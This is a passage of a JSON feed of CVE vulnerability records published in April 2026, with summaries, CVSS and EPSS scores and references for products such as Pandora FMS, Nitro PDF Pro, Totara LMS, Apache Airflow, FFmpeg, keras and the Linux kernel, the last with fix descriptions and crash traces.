This issue affects Pandora FMS: from 777 through 800","cvss":2.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.1,"epss":0.00047,"ranking_epss":0.14223,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"],"published_time":"2026-04-13T16:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30813","summary":"Improper Neutralization of Special Elements used in an SQL Command vulnerability allows SQL Injection via module search. This issue affects Pandora FMS: from 777 through 800","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.7,"epss":0.0003,"ranking_epss":0.08432,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"],"published_time":"2026-04-13T16:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30804","summary":"Unrestricted Upload of File with Dangerous Type vulnerability allows Remote Code Execution via file upload. This issue affects Pandora FMS: from 777 through 800","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.6,"epss":0.00367,"ranking_epss":0.58697,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"],"published_time":"2026-04-13T16:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30806","summary":"Improper Neutralization of Special Elements used in an OS Command vulnerability allows OS Command Injection via Network Report. 
This issue affects Pandora FMS: from 777 through 800","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.7,"epss":0.0062,"ranking_epss":0.70028,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"],"published_time":"2026-04-13T16:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30809","summary":"Improper Neutralization of Special Elements used in an OS Command vulnerability allows OS Command Injection via WebServerModuleDebug. This issue affects Pandora FMS: from 777 through 800","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.7,"epss":0.00464,"ranking_epss":0.64317,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"],"published_time":"2026-04-13T16:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30811","summary":"Missing Authorization vulnerability allows Exposure of Sensitive Information via configuration endpoint. This issue affects Pandora FMS: from 777 through 800","cvss":8.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.4,"epss":0.00038,"ranking_epss":0.11431,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/"],"published_time":"2026-04-13T16:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-31991","summary":"Rate Limiting for attempting a user login is not being properly enforced, making HCL DevOps Velocity susceptible to brute-force attacks past the unsuccessful login attempt limit.  
This vulnerability is fixed in 5.1.7.","cvss":6.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.8,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.06582,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130138"],"published_time":"2026-04-13T16:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-63743","summary":"Cross-Site Scripting vulnerability in the Snipe-IT web-based asset management system v8.3.0 to up and including v8.3.1 allows authenticated attacker with lowest privileges sufficient only to log in, to inject arbitrary JavaScript code via \"Name\" and \"Surname\" fields. The JavaScript code is executed whenever \"Activity Report\" or modified profile is viewed directly by any user with sufficient permissions. Successful exploitation of this issue requires that the profile's \"Display Name\" is not set. The vulnerability is fixed in v8.3.2.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02303,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://grokability.com","http://snipe-it.com","https://github.com/grokability/snipe-it/commit/b6d397bcca4e8a05176b782de769d7160058bfc4#diff-7fe056d76c09808dac923c4639161d587c3fff281a01122f3e10c4a781674a65","https://github.com/mikust/CVEs/tree/main/CVE-2025-63743"],"published_time":"2026-04-13T16:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-66769","summary":"A NULL pointer dereference in Nitro PDF Pro for Windows v14.41.1.4 allows attackers to cause a Denial of Service (DoS) via a crafted XFA 
packet.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02032,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://jeroscope.com/advisories/2025/jero-2025-015/","https://www.gonitro.com/"],"published_time":"2026-04-13T16:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-69624","summary":"Nitro PDF Pro for Windows 14.41.1.4 contains a NULL pointer dereference vulnerability in the JavaScript implementation of app.alert(). When app.alert() is called with more than one argument and the first argument evaluates to null (for example, app.alert(app.activeDocs, true) when app.activeDocs is null), the engine routes the call through a fallback path intended for non-string arguments. In this path, js_ValueToString() is invoked on the null value and returns an invalid string pointer, which is then passed to JS_GetStringChars() without validation. Dereferencing this pointer leads to an access violation and application crash when opening a crafted PDF.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02056,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://nitro.com"],"published_time":"2026-04-13T16:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-69627","summary":"Nitro PDF Pro for Windows 14.41.1.4 contains a heap use-after-free vulnerability in the implementation of the JavaScript method this.mailDoc(). During execution, an internal XID object is allocated and then freed prematurely, after which the freed pointer is still passed into UI and logging helper functions. Because the freed memory region may contain unpredictable heap data or remnants of attacker-controlled JavaScript strings, downstream routines such as wcscmp() may process invalid or stale pointers. 
This can result in access violations and non-deterministic crashes.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00373,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://nitro.com","https://jeroscope.com/advisories/2025/jero-2025-016/"],"published_time":"2026-04-13T16:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6182","summary":"A vulnerability was identified in code-projects Simple Content Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /web/admin/login.php. Such manipulation of the argument User leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/Xmyronn/simple-cms-sqli-login-bypass-CVE-HUNT-","https://vuldb.com/submit/797263","https://vuldb.com/vuln/357105","https://vuldb.com/vuln/357105/cti"],"published_time":"2026-04-13T15:17:49","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6183","summary":"A security flaw has been discovered in code-projects Simple Content Management System 1.0. Affected by this issue is some unknown functionality of the file /web/index.php. Performing a manipulation of the argument ID results in sql injection. Remote exploitation of the attack is possible. 
The exploit has been released to the public and may be used for attacks.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/Xmyronn/simple-cms-sqli-id-parameter","https://vuldb.com/submit/797264","https://vuldb.com/vuln/357106","https://vuldb.com/vuln/357106/cti"],"published_time":"2026-04-13T15:17:49","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36941","summary":"Sourcecodester Online Resort Management System v1.0 is vulnerable to SQL Injection in the file /orms/admin/rooms/manage_room.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/online-resort-management-system/SQL-5.md"],"published_time":"2026-04-13T15:17:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36942","summary":"Sourcecodester Online Resort Management System v1.0 is vulnerable to SQL injection in the file /orms/admin/activities/manage_activity.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.0535,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/online-resort-management-system/SQL-4.md"],"published_time":"2026-04-13T15:17:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36943","summary":"Sourcecodester Computer and Mobile Repair Shop Management System v1.0 is vulnerable to SQL injection in the file 
/rsms/admin/repairs/manage_repair.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/computer-and-mobile-repair-shop-management-system/SQL-2.md"],"published_time":"2026-04-13T15:17:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36944","summary":"Sourcecodester Computer and Mobile Repair Shop Management System v1.0 is vulnerable to SQL injection in the file /rsms/admin/repairs/view_details.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/computer-and-mobile-repair-shop-management-system/SQL-1.md"],"published_time":"2026-04-13T15:17:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36945","summary":"Sourcecodester Computer and Mobile Repair Shop Management System v1.0 is vulnerable to SQL injection in the file /rsms/admin/clients/manage_client.php","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/computer-and-mobile-repair-shop-management-system/SQL-3.md"],"published_time":"2026-04-13T15:17:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31282","summary":"Totara LMS v19.1.5 and before is vulnerable to Incorrect Access Control. The login page code can be manipulated to reveal the login form. 
An attacker can chain that with missing rate-limit on the login form to launch a brute force attack.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04749,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saykino/CVE-2026-31282","https://www.totara.com/"],"published_time":"2026-04-13T15:17:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31283","summary":"In Totara LMS v19.1.5 and before, the forgot password API does not implement rate limiting for the target email address, which can be used for an Email Bombing attack.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04749,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saykino/CVE-2026-31283","https://totara.com/"],"published_time":"2026-04-13T15:17:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33858","summary":"Dag Authors, who normally should not be able to execute code in the webserver context, could craft XCom payload causing the webserver to execute arbitrary code. 
Since Dag Authors are already highly trusted, severity of this issue is Low.\n\n\nUsers are recommended to upgrade to Apache Airflow 3.2.0, which resolves this issue.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":0.0007,"ranking_epss":0.21359,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/airflow/pull/64148","https://lists.apache.org/thread/1npt3o2x81s0gw9tmfcv4n7p1z9hdmy0","http://www.openwall.com/lists/oss-security/2026/04/13/7"],"published_time":"2026-04-13T15:17:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30997","summary":"An out-of-bounds read in the read_global_param() function (libavcodec/av1dec.c) of FFmpeg v8.0.1 allows attackers to cause a Denial of Service (DoS) via a crafted input.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.0004,"ranking_epss":0.1194,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://excellent-oatmeal-319.notion.site/CVE-2026-30997-Out-of-Bounds-Access-a7929817b9794568b2f7774397c7d65f","https://github.com/FFmpeg/FFmpeg"],"published_time":"2026-04-13T15:17:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30998","summary":"An improper resource deallocation and closure vulnerability in the tools/zmqsend.c component of FFmpeg v8.0.1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted input 
file.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00038,"ranking_epss":0.1113,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://excellent-oatmeal-319.notion.site/CVE-2026-30998-Resource-Leak-3265a71f9cca4dc58df4632ce8b60a50","https://ffmpeg.org/doxygen/7.0/zmqsend_8c_source.html","https://github.com/FFmpeg/FFmpeg/blob/master/tools/zmqsend.c"],"published_time":"2026-04-13T15:17:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30999","summary":"A heap buffer overflow in the av_bprint_finalize() function of FFmpeg v8.0.1 allows attackers to cause a Denial of Service (DoS) via a crafted input.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00041,"ranking_epss":0.12417,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://excellent-oatmeal-319.notion.site/CVE-2026-30999-Memory-Leak-e0d88ac53e2e42c1b5ef9aa3497e27b6","https://ffmpeg.org/doxygen/7.0/zmqsend_8c_source.html","https://github.com/FFmpeg/FFmpeg/blob/master/tools/zmqsend.c","https://www.ffmpeg.org/download.html"],"published_time":"2026-04-13T15:17:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31281","summary":"Totara LMS v19.1.5 and before is vulnerable to HTML Injection. 
An attacker can inject malicious HTML code in a message and send it to all the users in the application, resulting in executing the code and may lead to session hijacking and executing commands on the victim's browser.","cvss":8.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.0,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04749,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saykino/CVE-2026-31281","https://www.totara.com/"],"published_time":"2026-04-13T15:17:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-29628","summary":"A stack overflow in the experimental/tinyobj_loader_opt.h file of tinyobjloader commit d56555b allows attackers to cause a Denial of Service (DoS) via supplying a crafted .mtl file.","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02068,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/kiyochii/CVE-2026-29628","https://github.com/kiyochii/tinyobjloader/commit/386b73bb8c1a855236beb73b11f45f7feac4e03a"],"published_time":"2026-04-13T15:17:19","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-1462","summary":"A vulnerability in the `TFSMLayer` class of the `keras` package, version 3.13.0, allows attacker-controlled TensorFlow SavedModels to be loaded during deserialization of `.keras` models, even when `safe_mode=True`. This bypasses the security guarantees of `safe_mode` and enables arbitrary attacker-controlled code execution during model inference under the victim's privileges. 
The issue arises due to the unconditional loading of external SavedModels, serialization of attacker-controlled file paths, and the lack of validation in the `from_config()` method.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":0.0006,"ranking_epss":0.18735,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/keras-team/keras/commit/b6773d3decaef1b05d8e794458e148cb362f163f","https://huntr.com/bounties/7e78d6f1-6977-4300-b595-e81bdbda331c"],"published_time":"2026-04-13T15:17:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-66236","summary":"Before Airflow 3.2.0, it was unclear that secure Airflow deployments require the Deployment Manager to take appropriate actions and pay attention to security details and security model of Airflow. Some assumptions the Deployment Manager could make were not clear or explicit enough, even though Airflow's intentions and security model of Airflow did not suggest different assumptions. The overall security model [1], workload isolation [2], and JWT authentication details [3] are now described in more detail. Users concerned with role isolation and following the Airflow security model of Airflow are advised to upgrade to Airflow 3.2, where several security improvements have been implemented. They should also read and follow the relevant documents to make sure that their deployment is secure enough. It also clarifies that the Deployment Manager is ultimately responsible for securing your Airflow deployment. 
This had also been communicated via Airflow 3.2.0 Blog announcement [4].\n\n[1] Security Model:  https://airflow.apache.org/docs/apache-airflow/stable/security/jwt_token_authentication.html \n[2] Workload isolation:  https://airflow.apache.org/docs/apache-airflow/stable/security/workload.html \n[3] JWT Token authentication:  https://airflow.apache.org/docs/apache-airflow/stable/security/jwt_token_authentication.html \n[4] Airflow 3.2.0 Blog announcement:  https://airflow.apache.org/blog/airflow-3.2.0/ \n\n\n\nUsers are recommended to upgrade to version 3.2.0, which fixes this issue.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00042,"ranking_epss":0.12476,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/airflow/pull/58662","https://lists.apache.org/thread/g8fyy1tkmxkkfk7tx2v6h8mvwzpyykbo","http://www.openwall.com/lists/oss-security/2026/04/13/6"],"published_time":"2026-04-13T15:17:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36947","summary":"Sourcecodester Computer and Mobile Repair Shop Management System v1.0 is vulnerable to SQL Injection in the file /rsms/admin/services/view_service.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/computer-and-mobile-repair-shop-management-system/SQL-5.md"],"published_time":"2026-04-13T14:16:14","vendor":"oretnom23","product":"computer_and_mobile_repair_shop_management_system","version":null},{"cve_id":"CVE-2026-36946","summary":"Sourcecodester Computer and Mobile Repair Shop Management System v1.0 is vulnerable to SQL injection in the file 
/rsms/admin/inquiries/view_details.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.0535,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/computer-and-mobile-repair-shop-management-system/SQL-4.md"],"published_time":"2026-04-13T14:16:13","vendor":"oretnom23","product":"computer_and_mobile_repair_shop_management_system","version":null},{"cve_id":"CVE-2026-31423","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_hfsc: fix divide-by-zero in rtsc_min()\n\nm2sm() converts a u32 slope to a u64 scaled value.  For large inputs\n(e.g. m1=4000000000), the result can reach 2^32.  rtsc_min() stores\nthe difference of two such u64 values in a u32 variable `dsm` and\nuses it as a divisor.  When the difference is exactly 2^32 the\ntruncation yields zero, causing a divide-by-zero oops in the\nconcave-curve intersection path:\n\n  Oops: divide error: 0000\n  RIP: 0010:rtsc_min (net/sched/sch_hfsc.c:601)\n  Call Trace:\n   init_ed (net/sched/sch_hfsc.c:629)\n   hfsc_enqueue (net/sched/sch_hfsc.c:1569)\n   [...]\n\nWiden `dsm` to u64 and replace do_div() with div64_u64() so the full\ndifference is 
preserved.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/17c1b9807b8a67d676b6dcf749ee932ebaa7f568","https://git.kernel.org/stable/c/25b6821884713a31e2b49fb67b0ebd765b33e0a9","https://git.kernel.org/stable/c/4576100b8cd03118267513cafacde164b498b322","https://git.kernel.org/stable/c/b9e6431cbea8bb1fae8069ed099b4ee100499835","https://git.kernel.org/stable/c/c56f78614e7781aaceca9bd3cb2128bf7d45c3bd","https://git.kernel.org/stable/c/d0aefec1b1a1ba2c1d251028dc2c4e5b4ce1fea5"],"published_time":"2026-04-13T14:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31424","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: x_tables: restrict xt_check_match/xt_check_target extensions for NFPROTO_ARP\n\nWeiming Shi says:\n\nxt_match and xt_target structs registered with NFPROTO_UNSPEC can be\nloaded by any protocol family through nft_compat. When such a\nmatch/target sets .hooks to restrict which hooks it may run on, the\nbitmask uses NF_INET_* constants. This is only correct for families\nwhose hook layout matches NF_INET_*: IPv4, IPv6, INET, and bridge\nall share the same five hooks (PRE_ROUTING ... POST_ROUTING).\n\nARP only has three hooks (IN=0, OUT=1, FORWARD=2) with different\nsemantics. Because NF_ARP_OUT == 1 == NF_INET_LOCAL_IN, the .hooks\nvalidation silently passes for the wrong reasons, allowing matches to\nrun on ARP chains where the hook assumptions (e.g. state->in being\nset on input hooks) do not hold. 
This leads to NULL pointer\ndereferences; xt_devgroup is one concrete example:\n\n Oops: general protection fault, probably for non-canonical address 0xdffffc0000000044: 0000 [#1] SMP KASAN NOPTI\n KASAN: null-ptr-deref in range [0x0000000000000220-0x0000000000000227]\n RIP: 0010:devgroup_mt+0xff/0x350\n Call Trace:\n  <TASK>\n  nft_match_eval (net/netfilter/nft_compat.c:407)\n  nft_do_chain (net/netfilter/nf_tables_core.c:285)\n  nft_do_chain_arp (net/netfilter/nft_chain_filter.c:61)\n  nf_hook_slow (net/netfilter/core.c:623)\n  arp_xmit (net/ipv4/arp.c:666)\n  </TASK>\n Kernel panic - not syncing: Fatal exception in interrupt\n\nFix it by restricting arptables to NFPROTO_ARP extensions only.\nNote that arptables-legacy only supports:\n\n- arpt_CLASSIFY\n- arpt_mangle\n- arpt_MARK\n\nthat provide explicit NFPROTO_ARP match/target declarations.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/1cd6313c8644bfebbd813a05da9daa21b09dd68c","https://git.kernel.org/stable/c/3d5d488f11776738deab9da336038add95d342d1","https://git.kernel.org/stable/c/3e79374b03bf9a2f282f0eb1d0ac3776f7e0f28a","https://git.kernel.org/stable/c/dc3e27dd7d76e21106b8f9bbdc31f5da74a89014","https://git.kernel.org/stable/c/e7e1b6bcb389c8708003d40613a59ff2496f6b1f","https://git.kernel.org/stable/c/f00ac65c90ea475719e08d629e2e26c8b4e6999b"],"published_time":"2026-04-13T14:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31425","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nrds: ib: reject FRMR registration before IB connection is established\n\nrds_ib_get_mr() extracts the rds_ib_connection from conn->c_transport_data\nand passes it to rds_ib_reg_frmr() for FRWR memory registration. 
On a\nfresh outgoing connection, ic is allocated in rds_ib_conn_alloc() with\ni_cm_id = NULL because the connection worker has not yet called\nrds_ib_conn_path_connect() to create the rdma_cm_id. When sendmsg() with\nRDS_CMSG_RDMA_MAP is called on such a connection, the sendmsg path parses\nthe control message before any connection establishment, allowing\nrds_ib_post_reg_frmr() to dereference ic->i_cm_id->qp and crash the\nkernel.\n\nThe existing guard in rds_ib_reg_frmr() only checks for !ic (added in\ncommit 9e630bcb7701), which does not catch this case since ic is allocated\nearly and is always non-NULL once the connection object exists.\n\n KASAN: null-ptr-deref in range [0x0000000000000010-0x0000000000000017]\n RIP: 0010:rds_ib_post_reg_frmr+0x50e/0x920\n Call Trace:\n  rds_ib_post_reg_frmr (net/rds/ib_frmr.c:167)\n  rds_ib_map_frmr (net/rds/ib_frmr.c:252)\n  rds_ib_reg_frmr (net/rds/ib_frmr.c:430)\n  rds_ib_get_mr (net/rds/ib_rdma.c:615)\n  __rds_rdma_map (net/rds/rdma.c:295)\n  rds_cmsg_rdma_map (net/rds/rdma.c:860)\n  rds_sendmsg (net/rds/send.c:1363)\n  ____sys_sendmsg\n  do_syscall_64\n\nAdd a check in rds_ib_get_mr() that verifies ic, i_cm_id, and qp are all\nnon-NULL before proceeding with FRMR registration, mirroring the guard\nalready present in rds_ib_post_inv(). 
Return -ENODEV when the connection\nis not ready, which the existing error handling in rds_cmsg_send() converts\nto -EAGAIN for userspace retry and triggers rds_conn_connect_if_down() to\nstart the connection worker.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/23e07c340c445f0ebff7757ba15434cb447eb662","https://git.kernel.org/stable/c/450ec93c0f172374acbf236f1f5f02d53650aa2d","https://git.kernel.org/stable/c/47de5b73db3b88f45c107393f26aeba26e9e8fae","https://git.kernel.org/stable/c/6b0a8de67ac0c74e1a7df92b73c862cb36780dfc","https://git.kernel.org/stable/c/a54ecccfae62c5c85259ae5ea5d9c20009519049","https://git.kernel.org/stable/c/a5bfd14c9a299e6db4add4440430ee5e010b03ad"],"published_time":"2026-04-13T14:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31426","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nACPI: EC: clean up handlers on probe failure in acpi_ec_setup()\n\nWhen ec_install_handlers() returns -EPROBE_DEFER on reduced-hardware\nplatforms, it has already started the EC and installed the address\nspace handler with the struct acpi_ec pointer as handler context.\nHowever, acpi_ec_setup() propagates the error without any cleanup.\n\nThe caller acpi_ec_add() then frees the struct acpi_ec for non-boot\ninstances, leaving a dangling handler context in ACPICA.\n\nAny subsequent AML evaluation that accesses an EC OpRegion field\ndispatches into acpi_ec_space_handler() with the freed pointer,\ncausing a use-after-free:\n\n BUG: KASAN: slab-use-after-free in mutex_lock (kernel/locking/mutex.c:289)\n Write of size 8 at addr ffff88800721de38 by task init/1\n Call Trace:\n  <TASK>\n  mutex_lock (kernel/locking/mutex.c:289)\n  acpi_ec_space_handler (drivers/acpi/ec.c:1362)\n  acpi_ev_address_space_dispatch 
(drivers/acpi/acpica/evregion.c:293)\n  acpi_ex_access_region (drivers/acpi/acpica/exfldio.c:246)\n  acpi_ex_field_datum_io (drivers/acpi/acpica/exfldio.c:509)\n  acpi_ex_extract_from_field (drivers/acpi/acpica/exfldio.c:700)\n  acpi_ex_read_data_from_field (drivers/acpi/acpica/exfield.c:327)\n  acpi_ex_resolve_node_to_value (drivers/acpi/acpica/exresolv.c:392)\n  </TASK>\n\n Allocated by task 1:\n  acpi_ec_alloc (drivers/acpi/ec.c:1424)\n  acpi_ec_add (drivers/acpi/ec.c:1692)\n\n Freed by task 1:\n  kfree (mm/slub.c:6876)\n  acpi_ec_add (drivers/acpi/ec.c:1751)\n\nThe bug triggers on reduced-hardware EC platforms (ec->gpe < 0)\nwhen the GPIO IRQ provider defers probing. Once the stale handler\nexists, any unprivileged sysfs read that causes AML to touch an\nEC OpRegion (battery, thermal, backlight) exercises the dangling\npointer.\n\nFix this by calling ec_remove_handlers() in the error path of\nacpi_ec_setup() before clearing first_ec. ec_remove_handlers()\nchecks each EC_FLAGS_* bit before acting, so it is safe to call\nregardless of how far ec_install_handlers() progressed:\n\n  -ENODEV  (handler not installed): only calls acpi_ec_stop()\n  -EPROBE_DEFER (handler installed): removes handler, stops EC","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/022d1727f33ff90b3e1775125264e3023901952e","https://git.kernel.org/stable/c/808c0f156f48d5b8ca34088cbbfba8444e606cbc","https://git.kernel.org/stable/c/9c886e63b69658959633937e3acb7ca8addf7499","https://git.kernel.org/stable/c/be1a827e15991e874e0d5222d0ea5fdad01960fe","https://git.kernel.org/stable/c/d04c007047c88158141d9bd5eac761cdadd3782c","https://git.kernel.org/stable/c/f6484cadbcaf26b5844b51bd7307a663dda48ef6"],"published_time":"2026-04-13T14:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31427","summary":"In the Linux 
kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_conntrack_sip: fix use of uninitialized rtp_addr in process_sdp\n\nprocess_sdp() declares union nf_inet_addr rtp_addr on the stack and\npasses it to the nf_nat_sip sdp_session hook after walking the SDP\nmedia descriptions. However rtp_addr is only initialized inside the\nmedia loop when a recognized media type with a non-zero port is found.\n\nIf the SDP body contains no m= lines, only inactive media sections\n(m=audio 0 ...) or only unrecognized media types, rtp_addr is never\nassigned. Despite that, the function still calls hooks->sdp_session()\nwith &rtp_addr, causing nf_nat_sdp_session() to format the stale stack\nvalue as an IP address and rewrite the SDP session owner and connection\nlines with it.\n\nWith CONFIG_INIT_STACK_ALL_ZERO (default on most distributions) this\nresults in the session-level o= and c= addresses being rewritten to\n0.0.0.0 for inactive SDP sessions. Without stack auto-init the\nrewritten address is 